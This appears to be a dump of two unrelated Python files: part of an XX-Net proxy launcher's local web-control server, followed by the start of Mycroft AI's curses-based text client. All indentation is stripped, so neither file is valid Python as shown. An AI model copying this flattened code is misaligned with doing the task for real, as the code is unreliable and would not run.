path = '/' + '/'.join(url_path_list[4:])
controler = module_init.proc_handler[module]["imp"].local.web_control.ControlHandler(self.client_address, self.headers, self.command, path, self.rfile, self.wfile)
controler.do_GET()
return
else:
relate_path = '/'.join(url_path_list[3:])
file_path = os.path.join(root_path, module, "web_ui", relate_path)
if not os.path.isfile(file_path):
return self.send_not_found()
# i18n code lines (Both the locale dir & the template dir are module-dependent)
locale_dir = os.path.abspath(os.path.join(root_path, module, 'lang'))
content = i18n_translator.render(locale_dir, file_path)
return self.send_response('text/html', content)
else:
file_path = os.path.join(current_path, 'web_ui' + url_path)
xlog.debug ('launcher web_control %s %s %s ', self.address_string(), self.command, self.path)
if os.path.isfile(file_path):
if file_path.endswith('.js'):
mimetype = 'application/javascript'
elif file_path.endswith('.css'):
mimetype = 'text/css'
elif file_path.endswith('.html'):
mimetype = 'text/html'
elif file_path.endswith('.jpg'):
mimetype = 'image/jpeg'
elif file_path.endswith('.png'):
mimetype = 'image/png'
else:
mimetype = 'text/plain'
self.send_file(file_path, mimetype)
elif url_path == '/config':
self.req_config_handler()
elif url_path == '/update':
self.req_update_handler()
elif url_path == '/init_module':
self.req_init_module_handler()
elif url_path == '/quit':
self.send_response('text/html', '{"status":"success"}')
module_init.stop_all()
os._exit(0)
elif url_path == '/restart':
self.send_response('text/html', '{"status":"success"}')
update_from_github.restart_xxnet()
else:
self.send_not_found()
xlog.info('%s "%s %s HTTP/1.1" 404 -', self.address_string(), self.command, self.path)
def req_index_handler(self):
req = urlparse.urlparse(self.path).query
reqs = urlparse.parse_qs(req, keep_blank_values=True)
try:
target_module = reqs['module'][0]
target_menu = reqs['menu'][0]
except:
if config.get(['modules', 'gae_proxy', 'auto_start'], 0) == 1:
target_module = 'gae_proxy'
target_menu = 'status'
else:
target_module = 'launcher'
target_menu = 'about'
if len(module_menus) == 0:
self.load_module_menus()
# i18n code lines (Both the locale dir & the template dir are module-dependent)
locale_dir = os.path.abspath(os.path.join(current_path, 'lang'))
index_content = i18n_translator.render(locale_dir, os.path.join(current_path, "web_ui", "index.html"))
current_version = update_from_github.current_version()
menu_content = ''
for module,v in module_menus:
#xlog.debug("m:%s id:%d", module, v['menu_sort_id'])
title = v["module_title"]
menu_content += '<li class="nav-header">%s</li>\n' % title
for sub_id in v['sub_menus']:
sub_title = v['sub_menus'][sub_id]['title']
sub_url = v['sub_menus'][sub_id]['url']
if target_module == module and target_menu == sub_url:
active = 'class="active"'
else:
active = ''
menu_content += '<li %s><a href="/?module=%s&menu=%s">%s</a></li>\n' % (active, module, sub_url, sub_title)
right_content_file = os.path.join(root_path, target_module, "web_ui", target_menu + ".html")
if os.path.isfile(right_content_file):
# i18n code lines (Both the locale dir & the template dir are module-dependent)
locale_dir = os.path.abspath(os.path.join(root_path, target_module, 'lang'))
right_content = i18n_translator.render(locale_dir, os.path.join(root_path, target_module, "web_ui", target_menu + ".html"))
else:
right_content = ""
data = (index_content.decode('utf-8') % (current_version, current_version, menu_content, right_content.decode('utf-8') )).encode('utf-8')
self.send_response('text/html', data)
def req_config_handler(self):
req = urlparse.urlparse(self.path).query
reqs = urlparse.parse_qs(req, keep_blank_values=True)
data = ''
if reqs['cmd'] == ['get_config']:
config.load()
check_update = config.get(["update", "check_update"], 1)
if check_update == 0:
check_update = "dont-check"
elif check_update == 1:
check_update = "stable"
data = '{ "check_update": "%s", "language": "%s", "popup_webui": %d, "allow_remote_connect": %d, \
"show_systray": %d, "auto_start": %d, "show_detail": %d, "php_enable": %d, "gae_proxy_enable": %d, \
"x_tunnel_enable": %d}' %\
(check_update
, config.get(["language"], i18n_translator.lang)
, config.get(["modules", "launcher", "popup_webui"], 1)
, config.get(["modules", "launcher", "allow_remote_connect"], 0)
, config.get(["modules", "launcher", "show_systray"], 1)
, config.get(["modules", "launcher", "auto_start"], 0)
, config.get(["modules", "gae_proxy", "show_detail"], 0)
, config.get(["modules", "php_proxy", "auto_start"], 0)
, config.get(["modules", "gae_proxy", "auto_start"], 0)
, config.get(["modules", "x_tunnel", "auto_start"], 0)
)
elif reqs['cmd'] == ['set_config']:
if 'check_update' in reqs:
check_update = reqs['check_update'][0]
if check_update not in ["dont-check", "stable", "test"]:
data = '{"res":"fail, check_update:%s"}' % check_update
else:
config.set(["update", "check_update"], check_update)
config.save()
data = '{"res":"success"}'
elif 'language' in reqs:
language = reqs['language'][0]
if language not in i18n_translator.get_valid_languages():
data = '{"res":"fail, language:%s"}' % language
else:
config.set(["language"], language)
config.save()
i18n_translator.lang = language
self.load_module_menus()
data = '{"res":"success"}'
elif 'popup_webui' in reqs:
popup_webui = int(reqs['popup_webui'][0])
if popup_webui != 0 and popup_webui != 1:
data = '{"res":"fail, popup_webui:%s"}' % popup_webui
else:
config.set(["modules", "launcher", "popup_webui"], popup_webui)
config.save()
data = '{"res":"success"}'
elif 'allow_remote_connect' in reqs:
allow_remote_connect = int(reqs['allow_remote_connect'][0])
if allow_remote_connect != 0 and allow_remote_connect != 1:
data = '{"res":"fail, allow_remote_connect:%s"}' % allow_remote_connect
else:
config.set(["modules", "launcher", "allow_remote_connect"], allow_remote_connect)
config.save()
data = '{"res":"success"}'
xlog.debug("restart web control.")
stop()
time.sleep(1)
start()
xlog.debug("launcher web control restarted.")
elif 'show_systray' in reqs:
show_systray = int(reqs['show_systray'][0])
if show_systray != 0 and show_systray != 1:
data = '{"res":"fail, show_systray:%s"}' % show_systray
else:
config.set(["modules", "launcher", "show_systray"], show_systray)
config.save()
data = '{"res":"success"}'
elif 'auto_start' in reqs:
auto_start = int(reqs['auto_start'][0])
if auto_start != 0 and auto_start != 1:
data = '{"res":"fail, auto_start:%s"}' % auto_start
else:
if auto_start:
autorun.enable()
else:
autorun.disable()
config.set(["modules", "launcher", "auto_start"], auto_start)
config.save()
data = '{"res":"success"}'
elif 'show_detail' in reqs:
show_detail = int(reqs['show_detail'][0])
if show_detail != 0 and show_detail != 1:
data = '{"res":"fail, show_detail:%s"}' % show_detail
else:
config.set(["modules", "gae_proxy", "show_detail"], show_detail)
config.save()
data = '{"res":"success"}'
elif 'gae_proxy_enable' in reqs :
gae_proxy_enable = int(reqs['gae_proxy_enable'][0])
if gae_proxy_enable != 0 and gae_proxy_enable != 1:
data = '{"res":"fail, gae_proxy_enable:%s"}' % gae_proxy_enable
else:
config.set(["modules", "gae_proxy", "auto_start"], gae_proxy_enable)
config.save()
if gae_proxy_enable:
module_init.start("gae_proxy")
else:
module_init.stop("gae_proxy")
self.load_module_menus()
data = '{"res":"success"}'
elif 'php_enable' in reqs :
php_enable = int(reqs['php_enable'][0])
if php_enable != 0 and php_enable != 1:
data = '{"res":"fail, php_enable:%s"}' % php_enable
else:
config.set(["modules", "php_proxy", "auto_start"], php_enable)
config.save()
if php_enable:
module_init.start("php_proxy")
else:
module_init.stop("php_proxy")
self.load_module_menus()
data = '{"res":"success"}'
elif 'x_tunnel_enable' in reqs :
x_tunnel_enable = int(reqs['x_tunnel_enable'][0])
if x_tunnel_enable != 0 and x_tunnel_enable != 1:
data = '{"res":"fail, x_tunnel_enable:%s"}' % x_tunnel_enable
else:
config.set(["modules", "x_tunnel", "auto_start"], x_tunnel_enable)
config.save()
if x_tunnel_enable:
module_init.start("x_tunnel")
else:
module_init.stop("x_tunnel")
self.load_module_menus()
data = '{"res":"success"}'
else:
data = '{"res":"fail"}'
self.send_response('text/html', data)
def req_update_handler(self):
req = urlparse.urlparse(self.path).query
reqs = urlparse.parse_qs(req, keep_blank_values=True)
data = ''
if reqs['cmd'] == ['get_progress']:
data = json.dumps(update_from_github.progress)
elif reqs['cmd'] == ['get_new_version']:
current_version = update_from_github.current_version()
github_versions = update_from_github.get_github_versions()
data = '{"res":"success", "test_version":"%s", "stable_version":"%s", "current_version":"%s"}' % (github_versions[0][1], github_versions[1][1], current_version)
xlog.info("%s", data)
elif reqs['cmd'] == ['update_version']:
version = reqs['version'][0]
update_from_github.start_update_version(version)
data = '{"res":"success"}'
self.send_response('text/html', data)
def req_init_module_handler(self):
req = urlparse.urlparse(self.path).query
reqs = urlparse.parse_qs(req, keep_blank_values=True)
data = ''
try:
module = reqs['module'][0]
config.load()
if reqs['cmd'] == ['start']:
result = module_init.start(module)
data = '{ "module": "%s", "cmd": "start", "result": "%s" }' % (module, result)
elif reqs['cmd'] == ['stop']:
result = module_init.stop(module)
data = '{ "module": "%s", "cmd": "stop", "result": "%s" }' % (module, result)
elif reqs['cmd'] == ['restart']:
result_stop = module_init.stop(module)
result_start = module_init.start(module)
data = '{ "module": "%s", "cmd": "restart", "stop_result": "%s", "start_result": "%s" }' % (module, result_stop, result_start)
except Exception as e:
xlog.exception("init_module except:%s", e)
self.send_response("text/html", data)
process = 0
server = 0
def start():
global process, server
# should use config.yaml to bing ip
allow_remote = config.get(["modules", "launcher", "allow_remote_connect"], 0)
host_port = config.get(["modules", "launcher", "control_port"], 8085)
if allow_remote:
host_addr = "0.0.0.0"
else:
host_addr = "127.0.0.1"
xlog.info("begin to start web control")
server = simple_http_server.HTTPServer((host_addr, host_port), Http_Handler)
process = threading.Thread(target=server.serve_forever)
process.setDaemon(True)
process.start()
xlog.info("launcher web control started.")
def stop():
global process, server
if process == 0:
return
xlog.info("begin to exit web control")
server.shutdown()
server.server_close()
process.join()
xlog.info("launcher web control exited.")
process = 0
def http_request(url, method="GET"):
proxy_handler = urllib2.ProxyHandler({})
opener = urllib2.build_opener(proxy_handler)
try:
req = opener.open(url, timeout=30)
return req
except Exception as e:
#xlog.exception("web_control http_request:%s fail:%s", url, e)
return False
def confirm_xxnet_exit():
"""suppose xxnet is running, try to close it
"""
is_xxnet_exit = False
xlog.debug("start confirm_xxnet_exit")
for i in range(30):
# gae_proxy(default port:8087)
if http_request("http://127.0.0.1:8087/quit") == False:
xlog.debug("good, xxnet:8087 cleared!")
is_xxnet_exit = True
break
else:
xlog.debug("<%d>: try to terminate xxnet:8087" % i)
time.sleep(1)
for i in range(30):
# web_control(default port:8085)
host_port = config.get(["modules", "launcher", "control_port"], 8085)
req_url = "http://127.0.0.1:{port}/quit".format(port=host_port)
if http_request(req_url) == False:
xlog.debug("good, xxnet:%s clear!" % host_port)
is_xxnet_exit = True
break
else:
xlog.debug("<%d>: try to terminate xxnet:%s" % (i, host_port))
time.sleep(1)
xlog.debug("finished confirm_xxnet_exit")
return is_xxnet_exit
def confirm_module_ready(port):
if port == 0:
xlog.error("confirm_module_ready with port 0")
time.sleep(1)
return False
for i in range(200):
req = http_request("http://127.0.0.1:%d/is_ready" % port)
if req == False:
time.sleep(1)
continue
content = req.read(1024)
req.close()
#xlog.debug("cert_import_ready return:%s", content)
if content == "True":
return True
else:
time.sleep(1)
return False
if __name__ == "__main__":
pass
#confirm_xxnet_exit()
# http_request("http://getbootstrap.com/dist/js/bootstrap.min.js")
|
text_client.py
|
# Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
import io
from math import ceil
import xdg.BaseDirectory
from .gui_server import start_qml_gui
from mycroft.tts import TTS
import os
import os.path
import time
import curses
import textwrap
import json
import mycroft.version
from threading import Thread, Lock
from mycroft.messagebus.client import MessageBusClient
from mycroft.messagebus.message import Message
from mycroft.util.log import LOG
from mycroft.configuration import Configuration
import locale
# Curses uses LC_ALL to determine how to display chars set it to system
# default
locale.setlocale(locale.LC_ALL, "") # Set LC_ALL to user default
preferred_encoding = locale.getpreferredencoding()
bSimple = False
bus = None # Mycroft messagebus connection
config = {} # Will be populated by the Mycroft configuration
event_thread = None
history = []
chat = [] # chat history, oldest at the lowest index
line = ""
scr = None
log_line_offset = 0 # num lines back in logs to show
log_line_lr_scroll = 0 # amount to scroll left/right for long lines
longest_visible_line = 0 # for HOME key
auto_scroll = True
# for debugging odd terminals
last_key = ""
show_last_key = False
show_gui = None # None = not initialized, else True/False
gui_text = []
log_lock = Lock()
max_log_lines = 5000
mergedLog = []
filteredLog = []
default_log_filters = ["mouth.viseme", "mouth.display", "mouth.icon"]
log_filters = list(default_log_filters)
log_files = []
find_str = None
cy_chat_area = 7 # default chat history height (in lines)
size_log_area = 0 # max number of visible log lines, calculated during draw
# Values used to display the audio meter
show_meter = True
meter_peak = 20
meter_cur = -1
meter_thresh = -1
SCR_MAIN = 0
SCR_HELP = 1
SCR_SKILLS = 2
screen_mode = SCR_MAIN
subscreen = 0 # for help pages, etc.
REDRAW_FREQUENCY = 10 # seconds between full redraws
last_redraw = time.time() - (REDRAW_FREQUENCY - 1) # seed for 1s redraw
screen_lock = Lock()
is_screen_dirty = True
# Curses color codes (reassigned at runtime)
CLR_HEADING = 0
CLR_FIND = 0
CLR_CHAT_RESP = 0
CLR_CHAT_QUERY = 0
CLR_CMDLINE = 0
CLR_INPUT = 0
CLR_LOG1 = 0
CLR_LOG2 = 0
CLR_LOG_DEBUG = 0
CLR_LOG_ERROR = 0
CLR_LOG_CMDMESSAGE = 0
CLR_METER_CUR = 0
CLR_METER = 0
# Allow Ctrl+C catching...
ctrl_c_was_pressed = False
def ctrl_c_handler(signum, frame):
global ctrl_c_was_pressed
ctrl_c_was_pressed = True
def ctrl_c_pressed():
global ctrl_c_was_pressed
if ctrl_c_was_pressed:
ctrl_c_was_pressed = False
return True
else:
return False
##############################################################################
# Helper functions
def clamp(n, smallest, largest):
""" Force n to be between smallest and largest, inclusive """
return max(smallest, min(n, largest))
def handleNonAscii(text):
"""
If default locale supports UTF-8 reencode the string otherwise
remove the offending characters.
"""
if preferred_encoding == 'ASCII':
return ''.join([i if ord(i) < 128 else ' ' for i in text])
else:
return text.encode(preferred_encoding)
##############################################################################
# Settings
filename = "mycroft_cli.conf"
def load_mycroft_config(bus):
""" Load the mycroft config and connect it to updates over the messagebus.
"""
Configuration.set_config_update_handlers(bus)
return Configuration.get()
def connect_to_mycroft():
""" Connect to the mycroft messagebus and load and register config
on the bus.
Sets the bus and config global variables
"""
global bus
global config
bus = connect_to_messagebus()
config = load_mycroft_config(bus)
def load_settings():
global log_filters
global cy_chat_area
global show_last_key
global max_log_lines
global show_meter
config_file = None
# Old location
path = os.path.join(os.path.expanduser("~"), ".mycroft_cli.conf")
if os.path.isfile(path):
LOG.warning(" ===============================================")
LOG.warning(" == DEPRECATION WARNING ==")
LOG.warning(" ===============================================")
LOG.warning(" You still have a config file at " +
path)
LOG.warning(" Note that this location is deprecated and will" +
" not be used in the future")
LOG.warning(" Please move it to " +
os.path.join(xdg.BaseDirectory.xdg_config_home, 'mycroft',
filename))
config_file = path
# Check XDG_CONFIG_DIR
if config_file is None:
for conf_dir in xdg.BaseDirectory.load_config_paths('mycroft'):
xdg_file = os.path.join(conf_dir, filename)
if os.path.isfile(xdg_file):
config_file = xdg_file
break
# Check /etc/mycroft
if config_file is None:
config_file = os.path.join("/etc/mycroft", filename)
try:
with io.open(config_file, 'r') as f:
config = json.load(f)
if "filters" in config:
# Disregard the filtering of DEBUG messages
log_filters = [f for f in config["filters"] if f != "DEBUG"]
if "cy_chat_area" in config:
cy_chat_area = config["cy_chat_area"]
if "show_last_key" in config:
show_last_key = config["show_last_key"]
if "max_log_lines" in config:
max_log_lines = config["max_log_lines"]
if "show_meter" in config:
show_meter = config["show_meter"]
except Exception as e:
LOG.info("Ignoring failed load of settings file")
def save_settings():
config = {}
config["filters"] = log_filters
config["cy_chat_area"] = cy_chat_area
config["show_last_key"] = show_last_key
config["max_log_lines"] = max_log_lines
config["show_meter"] = show_meter
config_file = os.path.join(
xdg.BaseDirectory.save_config_path("mycroft"), filename)
with io.open(config_file, 'w') as f:
f.write(str(json.dumps(config, ensure_ascii=False)))
##############################################################################
# Log file monitoring
class LogMonitorThread(Thread):
def __init__(self, filename, logid):
global log_files
Thread.__init__(self)
self.filename = filename
self.st_results = os.stat(filename)
self.logid = str(logid)
log_files.append(filename)
def run(self):
while True:
try:
st_results = os.stat(self.filename)
# Check if file has been modified since last read
if not st_results.st_mtime == self.st_results.st_mtime:
self.read_file_from(self.st_results.st_size)
self.st_results = st_results
set_screen_dirty()
except OSError:
# ignore any file IO exceptions, just try again
pass
time.sleep(0.1)
def read_file_from(self, bytefrom):
global meter_cur
global meter_thresh
global filteredLog
global mergedLog
global log_line_offset
global log_lock
with io.open(self.filename) as fh:
fh.seek(bytefrom)
while True:
line = fh.readline()
if line == "":
break
# Allow user to filter log output
ignore = False
if find_str:
if find_str not in line:
ignore = True
else:
for filtered_text in log_filters:
if filtered_text in line:
ignore = True
break
with log_lock:
if ignore:
mergedLog.append(self.logid + line.rstrip())
else:
if bSimple:
print(line.rstrip())
else:
filteredLog.append(self.logid + line.rstrip())
mergedLog.append(self.logid + line.rstrip())
if not auto_scroll:
log_line_offset += 1
# Limit log to max_log_lines
if len(mergedLog) >= max_log_lines:
with log_lock:
cToDel = len(mergedLog) - max_log_lines
if len(filteredLog) == len(mergedLog):
del filteredLog[:cToDel]
del mergedLog[:cToDel]
# release log_lock before calling to prevent deadlock
if len(filteredLog) != len(mergedLog):
rebuild_filtered_log()
def start_log_monitor(filename):
if os.path.isfile(filename):
thread = LogMonitorThread(filename, len(log_files))
thread.setDaemon(True) # this thread won't prevent prog from exiting
thread.start()
class MicMonitorThread(Thread):
def __init__(self, filename):
Thread.__init__(self)
self.filename = filename
self.st_results = None
def run(self):
while True:
try:
st_results = os.stat(self.filename)
if (not self.st_results or
not st_results.st_ctime == self.st_results.st_ctime or
not st_results.st_mtime == self.st_results.st_mtime):
self.read_mic_level()
self.st_results = st_results
set_screen_dirty()
except Exception:
# Ignore whatever failure happened and just try again later
pass
time.sleep(0.2)
def read_mic_level(self):
global meter_cur
global meter_thresh
with io.open(self.filename, 'r') as fh:
line = fh.readline()
# Just adjust meter settings
# Ex:Energy: cur=4 thresh=1.5 muted=0
cur_text, thresh_text, _ = line.split(' ')[-3:]
meter_thresh = float(thresh_text.split('=')[-1])
meter_cur = float(cur_text.split('=')[-1])
class ScreenDrawThread(Thread):
def __init__(self):
Thread.__init__(self)
def run(self):
global scr
global screen_lock
global is_screen_dirty
global log_lock
while scr:
try:
if is_screen_dirty:
# Use a lock to prevent screen corruption when drawing
# from multiple threads
with screen_lock:
is_screen_dirty = False
if screen_mode == SCR_MAIN:
with log_lock:
do_draw_main(scr)
elif screen_mode == SCR_HELP:
do_draw_help(scr)
finally:
time.sleep(0.01)
def start_mic_monitor(filename):
if os.path.isfile(filename):
thread = MicMonitorThread(filename)
thread.setDaemon(True) # this thread won't prevent prog from exiting
thread.start()
def add_log_message(message):
""" Show a message for the user (mixed in the logs) """
global filteredLog
global mergedLog
global log_line_offset
global log_lock
with log_lock:
message = "@" + message # the first byte is a code
filteredLog.append(message)
mergedLog.append(message)
if log_line_offset != 0:
log_line_offset = 0 # scroll so the user can see the message
set_screen_dirty()
def clear_log():
global filteredLog
global mergedLog
global log_line_offset
global log_lock
with log_lock:
mergedLog = []
filteredLog = []
log_line_offset = 0
def rebuild_filtered_log():
global filteredLog
global mergedLog
global log_lock
with log_lock:
filteredLog = []
for line in mergedLog:
# Apply filters
ignore = False
if find_str and find_str != "":
# Searching log
if find_str not in line:
ignore = True
else:
# Apply filters
for filtered_text in log_filters:
if filtered_text and filtered_text in line:
ignore = True
break
if not ignore:
filteredLog.append(line)
##############################################################################
# Capturing output from Mycroft
def handle_speak(event):
global chat
utterance = event.data.get('utterance')
utterance = TTS.remove_ssml(utterance)
if bSimple:
print(">> " + utterance)
else:
chat.append(">> " + utterance)
set_screen_dirty()
def handle_utterance(event):
global chat
global history
utterance = event.data.get('utterances')[0]
history.append(utterance)
chat.append(utterance)
set_screen_dirty()
def connect(bus):
""" Run the mycroft messagebus referenced by bus.
Args:
bus: Mycroft messagebus instance
"""
bus.run_forever()
##############################################################################
# Capturing the messagebus
def handle_message(msg):
# TODO: Think this thru a little bit -- remove this logging within core?
# add_log_message(msg)
pass
##############################################################################
# "Graphic primitives"
def draw(x, y, msg, pad=None, pad_chr=None, clr=None):
"""Draw a text to the screen
Args:
x (int): X coordinate (col), 0-based from upper-left
y (int): Y coordinate (row), 0-based from upper-left
msg (str): string to render to screen
pad (bool or int, optional): if int, pads/clips to given length, if
True use right edge of the screen.
pad_chr (char, optional): pad character, default is space
clr (int, optional): curses color, Defaults to CLR_LOG1.
"""
if y < 0 or y > curses.LINES or x < 0 or x > curses.COLS:
return
if x + len(msg) > curses.COLS:
s = msg[:curses.COLS - x]
else:
s = msg
if pad:
ch = pad_chr or " "
if pad is True:
pad = curses.COLS # pad to edge of screen
s += ch * (pad - x - len(msg))
else:
# pad to given length (or screen width)
if x + pad > curses.COLS:
pad = curses.COLS - x
s += ch * (pad - len(msg))
if not clr:
clr = CLR_LOG1
scr.addstr(y, x, s, clr)
##############################################################################
# Screen handling
def init_screen():
global CLR_HEADING
global CLR_FIND
global CLR_CHAT_RESP
global CLR_CHAT_QUERY
global CLR_CMDLINE
global CLR_INPUT
global CLR_LOG1
global CLR_LOG2
global CLR_LOG_DEBUG
global CLR_LOG_ERROR
global CLR_LOG_CMDMESSAGE
global CLR_METER_CUR
global CLR_METER
if curses.has_colors():
curses.init_pair(1, curses.COLOR_WHITE, curses.COLOR_BLACK)
bg = curses.COLOR_BLACK
for i in range(1, curses.COLORS):
curses.init_pair(i + 1, i, bg)
# Colors (on black backgound):
# 1 = white 5 = dk blue
# 2 = dk red 6 = dk purple
# 3 = dk green 7 = dk cyan
# 4 = dk yellow 8 = lt gray
CLR_HEADING = curses.color_pair(1)
CLR_CHAT_RESP = curses.color_pair(4)
CLR_CHAT_QUERY = curses.color_pair(7)
CLR_FIND = curses.color_pair(4)
CLR_CMDLINE = curses.color_pair(7)
CLR_INPUT = curses.color_pair(7)
CLR_LOG1 = curses.color_pair(3)
CLR_LOG2 = curses.color_pair(6)
CLR_LOG_DEBUG = curses.color_pair(4)
CLR_LOG_ERROR = curses.color_pair(2)
CLR_LOG_CMDMESSAGE = curses.color_pair(2)
CLR_METER_CUR = curses.color_pair(2)
CLR_METER = curses.color_pair(4)
def scroll_log(up, num_lines=None):
global log_line_offset
# default to a half-page
if not num_lines:
num_lines = size_log_area // 2
with log_lock:
if up:
log_line_offset -= num_lines
else:
log_line_offset += num_lines
if log_line_offset > len(filteredLog):
log_line_offset = len(filteredLog) - 10
if log_line_offset < 0:
log_line_offset = 0
set_screen_dirty()
def _do_meter(height):
if not show_meter or meter_cur == -1:
return
# The meter will look something like this:
#
# 8.4 *
# *
# -*- 2.4
# *
# *
# *
# Where the left side is the current level and the right side is
# the threshold level for 'silence'.
global scr
global meter_peak
if meter_cur > meter_peak:
meter_peak = meter_cur + 1
scale = meter_peak
if meter_peak > meter_thresh * 3:
scale = meter_thresh * 3
h_cur = clamp(int((float(meter_cur) / scale) * height), 0, height - 1)
h_thresh = clamp(
int((float(meter_thresh) / scale) * height), 0, height - 1)
clr = curses.color_pair(4) # dark yellow
str_level = "{0:3} ".format(int(meter_cur)) # e.g. ' 4'
str_thresh = "{0:4.2f}".format(meter_thresh) # e.g. '3.24'
meter_width = len(str_level) + len(str_thresh) + 4
for i in range(0, height):
meter = ""
if i == h_cur:
# current energy level
meter = str_level
else:
meter = " " * len(str_level)
if i == h_thresh:
# add threshold indicator
meter += "--- "
else:
meter += " "
if i == h_thresh:
# 'silence' threshold energy level
meter += str_thresh
# draw the line
meter += " " * (meter_width - len(meter))
scr.addstr(curses.LINES - 1 - i, curses.COLS -
len(meter) - 1, meter, clr)
# draw an asterisk if the audio energy is at this level
if i <= h_cur:
if meter_cur > meter_thresh:
clr_bar = curses.color_pair(3) # dark green for loud
else:
clr_bar = curses.color_pair(5) # dark blue for 'silent'
scr.addstr(curses.LINES - 1 - i, curses.COLS - len(str_thresh) - 4,
"*", clr_bar)
def _do_gui(gui_width):
clr = curses.color_pair(2) # dark red
x = curses.COLS - gui_width
y = 3
draw(
x,
y,
" " +
make_titlebar(
"= GUI",
gui_width -
1) +
" ",
clr=CLR_HEADING)
cnt = len(gui_text) + 1
if cnt > curses.LINES - 15:
cnt = curses.LINES - 15
for i in range(0, cnt):
draw(x, y + 1 + i, " !", clr=CLR_HEADING)
if i < len(gui_text):
draw(x + 2, y + 1 + i, gui_text[i], pad=gui_width - 3)
else:
draw(x + 2, y + 1 + i, "*" * (gui_width - 3))
draw(x + (gui_width - 1), y + 1 + i, "!", clr=CLR_HEADING)
draw(x, y + cnt, " " + "-" * (gui_width - 2) + " ", clr=CLR_HEADING)
def set_screen_dirty():
global is_screen_dirty
global screen_lock
with screen_lock:
is_screen_dirty = True
def do_draw_main(scr):
global log_line_offset
global longest_visible_line
global last_redraw
global auto_scroll
global size_log_area
if time.time() - last_redraw > REDRAW_FREQUENCY:
# Do a full-screen redraw periodically to clear and
# noise from non-curses text that get output to the
# screen (e.g. modules that do a 'print')
scr.clear()
last_redraw = time.time()
else:
scr.erase()
# Display log output at the top
cLogs = len(filteredLog) + 1 # +1 for the '--end--'
size_log_area = curses.LINES - (cy_chat_area + 5)
start = clamp(cLogs - size_log_area, 0, cLogs - 1) - log_line_offset
end = cLogs - log_line_offset
if start < 0:
end -= start
start = 0
if end > cLogs:
end = cLogs
auto_scroll = (end == cLogs)
# adjust the line offset (prevents paging up too far)
log_line_offset = cLogs - end
# Top header and line counts
if find_str:
scr.addstr(0, 0, "Search Results: ", CLR_HEADING)
scr.addstr(0, 16, find_str, CLR_FIND)
scr.addstr(0, 16 + len(find_str), " ctrl+X to end" +
" " * (curses.COLS - 31 - 12 - len(find_str)) +
str(start) + "-" + str(end) + " of " + str(cLogs),
CLR_HEADING)
else:
scr.addstr(0, 0, "Log Output:" + " " * (curses.COLS - 31) +
str(start) + "-" + str(end) + " of " + str(cLogs),
CLR_HEADING)
ver = " mycroft-core " + mycroft.version.CORE_VERSION_STR + " ==="
scr.addstr(1, 0, "=" * (curses.COLS - 1 - len(ver)), CLR_HEADING)
scr.addstr(1, curses.COLS - 1 - len(ver), ver, CLR_HEADING)
y = 2
for i in range(start, end):
if i >= cLogs - 1:
log = ' ^--- NEWEST ---^ '
else:
log = filteredLog[i]
logid = log[0]
if len(log) > 25 and log[5] == '-' and log[8] == '-':
log = log[11:] # skip logid & date at the front of log line
else:
log = log[1:] # just skip the logid
# Categorize log line
if "| DEBUG |" in log:
log = log.replace("Skills ", "")
clr = CLR_LOG_DEBUG
elif "| ERROR |" in log:
clr = CLR_LOG_ERROR
else:
if logid == "1":
clr = CLR_LOG1
elif logid == "@":
clr = CLR_LOG_CMDMESSAGE
else:
clr = CLR_LOG2
# limit output line to screen width
len_line = len(log)
if len(log) > curses.COLS:
start = len_line - (curses.COLS - 4) - log_line_lr_scroll
if start < 0:
start = 0
end = start + (curses.COLS - 4)
if start == 0:
log = log[start:end] + "~~~~" # start....
elif end >= len_line - 1:
log = "~~~~" + log[start:end] # ....end
else:
log = "~~" + log[start:end] + "~~" # ..middle..
if len_line > longest_visible_line:
longest_visible_line = len_line
scr.addstr(y, 0, handleNonAscii(log), clr)
y += 1
# Log legend in the lower-right
y_log_legend = curses.LINES - (3 + cy_chat_area)
scr.addstr(y_log_legend, curses.COLS // 2 + 2,
make_titlebar("Log Output Legend", curses.COLS // 2 - 2),
CLR_HEADING)
scr.addstr(y_log_legend + 1, curses.COLS // 2 + 2,
"DEBUG output",
CLR_LOG_DEBUG)
if len(log_files) > 0:
scr.addstr(y_log_legend + 2, curses.COLS // 2 + 2,
os.path.basename(log_files[0]) + ", other",
CLR_LOG2)
if len(log_files) > 1:
scr.addstr(y_log_legend + 3, curses.COLS // 2 + 2,
os.path.basename(log_files[1]), CLR_LOG1)
# Meter
y_meter = y_log_legend
if show_meter:
scr.addstr(y_meter, curses.COLS - 14, " Mic Level ",
CLR_HEADING)
# History log in the middle
y_chat_history = curses.LINES - (3 + cy_chat_area)
chat_width = curses.COLS // 2 - 2
chat_out = []
scr.addstr(y_chat_history, 0, make_titlebar("History", chat_width),
CLR_HEADING)
# Build a nicely wrapped version of the chat log
idx_chat = len(chat) - 1
while len(chat_out) < cy_chat_area and idx_chat >= 0:
if chat[idx_chat][0] == '>':
wrapper = textwrap.TextWrapper(initial_indent="",
subsequent_indent=" ",
width=chat_width)
else:
wrapper = textwrap.TextWrapper(width=chat_width)
chatlines = wrapper.wrap(chat[idx_chat])
for txt in reversed(chatlines):
if len(chat_out) >= cy_chat_area:
break
chat_out.insert(0, txt)
idx_chat -= 1
# Output the chat
y = curses.LINES - (2 + cy_chat_area)
for txt in chat_out:
if txt.startswith(">> ") or txt.startswith(" "):
clr = CLR_CHAT_RESP
else:
clr = CLR_CHAT_QUERY
scr.addstr(y, 1, handleNonAscii(txt), clr)
y += 1
if show_gui and curses.COLS > 20 and curses.LINES > 20:
_do_gui(curses.COLS - 20)
# Command line at the bottom
ln = line
if len(line) > 0 and line[0] == ":":
scr.addstr(curses.LINES - 2, 0, "Command ('help' for options):",
CLR_CMDLINE)
scr.addstr(curses.LINES - 1, 0, ":", CLR_CMDLINE)
ln = line[1:]
else:
prompt = "Input (':' for command, Ctrl+C to quit)"
if show_last_key:
prompt += " === keycode: " + last_key
scr.addstr(curses.LINES - 2, 0,
make_titlebar(prompt,
curses.COLS - 1),
CLR_HEADING)
scr.addstr(curses.LINES - 1, 0, ">", CLR_HEADING)
_do_meter(cy_chat_area + 2)
scr.addstr(curses.LINES - 1, 2, ln[-(curses.COLS - 3):], CLR_INPUT)
# Curses doesn't actually update the display until refresh() is called
scr.refresh()
def make_titlebar(title, bar_length):
